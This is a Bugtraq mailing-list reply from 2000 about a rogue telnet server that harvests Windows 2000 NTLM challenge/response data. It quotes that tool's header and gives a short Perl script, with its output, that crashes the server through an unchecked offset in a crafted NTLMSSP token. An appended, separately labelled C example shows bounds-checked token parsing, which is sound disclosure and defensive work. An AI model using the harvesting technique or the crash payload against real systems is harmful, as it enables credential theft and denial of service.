[16765] in bugtraq
Re: Win2k Telnet.exe malicious server vulnerability
daemon@ATHENA.MIT.EDU (Jim Paris)
Thu Sep 14 12:43:19 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-Id: <20000914120408.A18643@jtan.com>
Date: Thu, 14 Sep 2000 12:04:09 -0400
Reply-To: Jim Paris <jim@JTAN.COM>
From: Jim Paris <jim@JTAN.COM>
X-To: monti <monti@USHOST.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.BSF.3.96.1000913140710.26686A-201000@mournblade>; from monti@USHOST.COM on Wed, Sep 13, 2000 at 03:13:29PM -0500
> /* NTLM telnetD v0.8
>
> Snarfs NTLM challenge/response by convincing w2k telnet client to
> auto-authenticate.
> Outputs auth-data in LophtCrack sniff format on stdout.
>
> compile: gcc -o w2kteld ntlm_telnetd.c
> run: ./w2kteld
>
> Then wait for w2k to telnet to you.
> for the impatient, there are always ways of making w2k telnet!
...
<snip>
And if you happen to get bitten by this rogue server,
it must be time for a friendly little DoS against it.
(rp->upos is used as a pointer modifier without checking its bounds)
sardegna:~$ ./ntlm_telnetd -l 1234 & ( sleep 1; perl killit.pl )
[1] 23535
[ Fake NTLM Telnet Daemon - by yeza ]
Listening on port 1234
Awaiting connections
Connection from: 127.0.0.1
Got NTLM response token
[1]+ Segmentation fault ./ntlm_telnetd -l 1234
sardegna:~$
We are so batman. And now I'm late for class. (grr, 6.003)
-jim
#!/usr/bin/perl -w
#
# anti-ntlm-telnetd by jim@jtan
use IO::Socket;
my($s, $msg);
$s=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'localhost:1234') or die;
$s->recv($msg,1024);
$s->send("\xff\xfb\x25");
$s->recv($msg,1024);
$s->send("\xff\xfd");
$s->send("A"x7 . # foo
"\xFF" . # length (passed to gettoken)
"A"x7 . # bar
"NTLMSSP\0\x03" . # protocol and type
"A"x29 . # baz
"\xDE\xAD\xBE\xEF"); # rp->upos
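Added example, not part of Jim's post or of the ntlm_telnetd code: a bounds-checked reader for the NTLMSSP Type 3 token, i.e. the range check on the field offset/length whose absence the segfault above demonstrates. The sample token is constructed here rather than captured, and `read_secbuf`, `ntlm_type3_user` and `make_type3` are hypothetical names.

```c
#include <stdint.h>
#include <string.h>

/* NTLM "security buffer" descriptor: Len, MaxLen, Offset (all little-endian). */
struct sec_buf { uint16_t len, maxlen; uint32_t off; };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Read the descriptor at tok[pos] and refuse it unless the data it points at lies
 * entirely inside the received token. Skipping these two range checks is the bug
 * the message above triggers: the offset is added to the token base and used as-is. */
static int read_secbuf(const uint8_t *tok, size_t toklen, size_t pos, struct sec_buf *out) {
    if (pos + 8 > toklen) return 0;                /* descriptor itself is truncated */
    out->len = rd16(tok + pos);
    out->maxlen = rd16(tok + pos + 2);
    out->off = rd32(tok + pos + 4);
    if (out->off > toklen) return 0;               /* offset past the end, e.g. 0xDEADBEEF */
    if (out->len > toklen - out->off) return 0;    /* data would run off the end, e.g. 0xFF */
    return 1;
}

/* Extract the user name from an NTLMSSP Type 3 (AUTHENTICATE) token. Descriptors follow
 * the 12-byte header: LM(12) NT(20) domain(28) user(36) workstation(44). Returns 1 and
 * copies the raw name bytes (OEM or UTF-16LE per negotiated flags), or 0 if malformed. */
int ntlm_type3_user(const uint8_t *tok, size_t toklen, char *user, size_t usersz) {
    struct sec_buf u;
    if (toklen < 12 || memcmp(tok, "NTLMSSP", 8) != 0) return 0;   /* 8 bytes incl. NUL */
    if (rd32(tok + 8) != 3) return 0;              /* MessageType must be AUTHENTICATE */
    if (!read_secbuf(tok, toklen, 36, &u)) return 0;
    if (u.len >= usersz) return 0;                 /* must also fit our own buffer */
    memcpy(user, tok + u.off, u.len);
    user[u.len] = '\0';
    return 1;
}

/* Constructed sample (not captured traffic): a 67-byte Type 3 token carrying "bob" at
 * offset 64; the caller picks the user descriptor's Len/Offset to exercise bad values. */
size_t make_type3(uint8_t buf[67], uint16_t user_len, uint32_t user_off) {
    memset(buf, 0, 67);
    memcpy(buf, "NTLMSSP", 8);                     /* signature incl. trailing NUL */
    wr32(buf + 8, 3);                              /* MessageType = AUTHENTICATE */
    wr16(buf + 36, user_len);
    wr16(buf + 38, user_len);                      /* MaxLen = Len */
    wr32(buf + 40, user_off);
    memcpy(buf + 64, "bob", 3);
    return 67;
}
```

A well-formed token yields "bob"; the 0xDEADBEEF offset and the 0xFF length from the script above, as well as a token truncated before the user descriptor, are all rejected instead of being dereferenced.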